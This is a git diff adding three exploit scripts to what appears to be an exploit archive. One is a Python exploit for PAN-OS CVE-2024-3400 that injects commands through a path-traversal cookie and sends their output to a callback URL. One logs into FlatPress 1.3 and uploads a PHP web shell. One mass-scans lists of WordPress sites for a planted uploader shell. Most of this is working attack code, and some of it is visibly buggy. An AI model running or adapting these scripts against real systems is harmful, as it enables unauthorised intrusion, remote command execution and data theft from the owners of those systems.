Merge remote-tracking branch 'upstream/main'

exploits/linux_x86-64/remote/51996.txt

@@ -0,0 +1,150 @@
+# Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation
+# Date: 21 Apr 2024
+# Exploit Author: Kr0ff
+# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
+# Software Link: -
+# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
+#          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
+#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
+# Tested on: Debian
+# CVE : CVE-2024-3400
+
+#!/usr/bin/env python3
+
+import sys
+
+try:
+    import argparse
+    import requests
+except ImportError:
+    print("Missing dependencies, either requests or argparse not installed")
+    sys.exit(2)
+
+# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
+# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
+
+def check_vuln(target: str, file: str) -> bool:
+    ret = False
+
+    uri = "/ssl-vpn/hipreport.esp"
+
+    s = requests.Session()
+    r = ""
+
+    headers = {
+                "User-Agent" : \
+                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Cookie": \
+                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
+    }
+
+    headers_noCookie = {
+                "User-Agent" : \
+                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
+    }
+
+    if not "http://" or not "https://" in target:
+        target = "http://" + target
+        try:
+            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+        except requests.exceptions.Timeout or requests.ConnectionError as e:
+            print(f"Request timed out for \"HTTP\" !{e}")
+
+        print("Trying with \"HTTPS\"...")
+
+        target = "https://" + target
+        try:
+            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+        except requests.exceptions.Timeout or requests.ConnectionError as e:
+            print(f"Request timed out for \"HTTPS\"")
+            sys.exit(1)
+    else:
+        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+
+    if r.status_code == 200:
+        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
+        if r.status_code == 403:
+            print("Target vulnerable to CVE-2024-3400")
+            ret = True
+    else:
+        return ret
+
+    return ret
+
+
+
+def cmdexec(target: str, callback_url: str, payload: str) -> bool:
+    ret = False
+    p = ""
+
+    if " " in payload:
+        p = payload.replace(" ", "${IFS)")
+
+    uri = "/ssl-vpn/hipreport.esp"
+
+    headers = {
+                "User-Agent" : \
+                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Cookie": \
+                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"
+
+            }
+
+    s = requests.Session()
+    r = ""
+
+    if not "http://" or not "https://" in target:
+        target = "http://" + target
+        try:
+            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+        except requests.exceptions.Timeout or requests.ConnectionError as e:
+            print(f"Request timed out for \"HTTP\" !{e}")
+
+        print("Trying with \"HTTPS\"...")
+
+        target = "https://" + target
+        try:
+            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+        except requests.exceptions.Timeout or requests.ConnectionError as e:
+            print(f"Request timed out for \"HTTPS\"")
+            sys.exit(1)
+    else:
+        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+
+    if not "Success" in r.text:
+        return ret
+
+    else:
+        ret = True
+
+    return ret
+
+#Initilize parser for arguments
+def argparser(selection=None):
+    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )
+
+    subparser = parser.add_subparsers( help="Available modules", dest="module")
+
+    exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
+    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
+    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
+    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
+    #---------------------------------------
+    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
+    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
+    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )
+
+    args = parser.parse_args(selection)
+    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])
+
+    if args.module == "exploit":
+        cmdexec(args.target, args.callbackurl, args.payload)
+
+    if args.module == "check":
+        check_vuln(args.target, args.filename)
+
+if __name__ == "__main__":
+    argparser()
+    print("Finished !")

exploits/php/webapps/51997.txt

@@ -0,0 +1,78 @@
+# Exploit Title: FlatPress v1.3 - Remote Command Execution
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 19.04.2024
+# Vendor Homepage: https://www.flatpress.org
+# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
+# Tested Version: 1.3 (latest)
+# Tested on: MacOS
+
+import requests
+import time
+import random
+import string
+
+def random_string(length=5):
+    """Rastgele bir string oluşturur."""
+    letters = string.ascii_lowercase
+    return ''.join(random.choice(letters) for i in range(length))
+
+def login_and_upload(base_url, username, password):
+    filename = random_string() + ".php"
+    login_url = f"http://{base_url}/login.php"
+    upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"
+
+    with requests.Session() as session:
+        # Exploiting
+        print("Exploiting...")
+        time.sleep(1)
+
+        # Giriş yapma denemesi
+        login_data = {
+        'user': username,
+        'pass': password,
+        'submit': 'Login'
+        }
+        print("Logging in...")
+        response = session.post(login_url, data=login_data)
+        time.sleep(1)
+
+        if "Logout" in response.text:
+            print("Login Successful!")
+        else:
+            print("Login Failed!")
+            print(response.text)
+            return
+
+        # Dosya yükleme denemesi
+        print("Shell uploading...")
+        time.sleep(1)
+
+        # Form verileri ve dosyalar
+        files = {
+        'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
+        }
+        form_data = {
+        '_wpnonce': '9e0ed04260',
+        '_wp_http_referer': '/admin.php?p=uploader',
+        'upload': 'Upload'
+        }
+
+        response = session.post(upload_url, files=files, data=form_data)
+
+        if "File(s) uploaded" in response.text or "Upload" in response.text:
+            shell_url = f"http://{base_url}/fp-content/attachs/{filename}"
+            print(f"Your Shell is Ready: {shell_url}")
+            time.sleep(1)
+            print(f"Shell Usage: {shell_url}?0=command")
+        else:
+            print("Exploit Failed!")
+            print(response.status_code, response.text)
+
+# Örnek kullanım: python script.py siteadi.com username password
+if __name__ == "__main__":
+    import sys
+    if len(sys.argv) != 4:
+        print("Usage: script.py <base_url> <username> <password>")
+    else:
+        base_url, username, password = sys.argv[1:]
+        login_and_upload(base_url, username, password)

exploits/php/webapps/51998.txt

@@ -0,0 +1,88 @@
+# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
+# Date: 2024-04-16
+# Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# Vendor Homepage: https://wordpress.org
+# Software Link: https://wordpress.org/plugins/background-image-cropper/
+# Version: 1.2
+# Category : webapps
+# Tested on: windows 10 , firefox
+
+import sys , requests, re
+from multiprocessing.dummy import Pool
+from colorama import Fore
+from colorama import init
+init(autoreset=True)
+shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
+"<form method='post' enctype='multipart/form-data'> <input type='file'
+name='zb'><input type='submit' name='upload' value='upload'></form>";
+if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
+$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
+Upload."; } } ?>"""
+requests.urllib3.disable_warnings()
+headers = {'Connection': 'keep-alive',
+            'Cache-Control': 'max-age=0',
+            'Upgrade-Insecure-Requests': '1',
+            'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
+Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
+Chrome/60.0.3112.107 Moblie Safari/537.36',
+            'Accept':
+'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
+            'Accept-Encoding': 'gzip, deflate',
+            'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
+            'referer': 'www.google.com'}
+try:
+    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
+except IndexError:
+    path = str(sys.argv[0]).split('\\')
+    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
+
+def URLdomain(site):
+    if site.startswith("http://") :
+        site = site.replace("http://","")
+    elif site.startswith("https://") :
+        site = site.replace("https://","")
+    else :
+        pass
+    pattern = re.compile('(.*)/')
+    while re.findall(pattern,site):
+        sitez = re.findall(pattern,site)
+        site = sitez[0]
+    return site
+
+
+def FourHundredThree(url):
+    try:
+        url = 'http://' + URLdomain(url)
+        check =
+requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
+allow_redirects=True,timeout=15)
+        if 'enctype="multipart/form-data" name="uploader"
+id="uploader"><input type="file" name="file" size="50"><input name="_upl"
+type="submit" id="_upl" value="Upload' in check.content:
+                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+                open('Shells.txt', 'a').write(url +
+'/wp-content/plugins/background-image-cropper/ups.php\n')
+        else:
+            url = 'https://' + URLdomain(url)
+            check =
+requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
+allow_redirects=True,verify=False ,timeout=15)
+            if 'enctype="multipart/form-data" name="uploader"
+id="uploader"><input type="file" name="file" size="50"><input name="_upl"
+type="submit" id="_upl" value="Upload' in check.content:
+                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+                    open('Shells.txt', 'a').write(url +
+'/wp-content/plugins/background-image-cropper/ups.php\n')
+            else:
+                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+    except :
+        print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+
+mp = Pool(150)
+mp.map(FourHundredThree, target)
+mp.close()
+mp.join()
+
+print '\n [!] {}Saved in LOL.txt'.format(fc)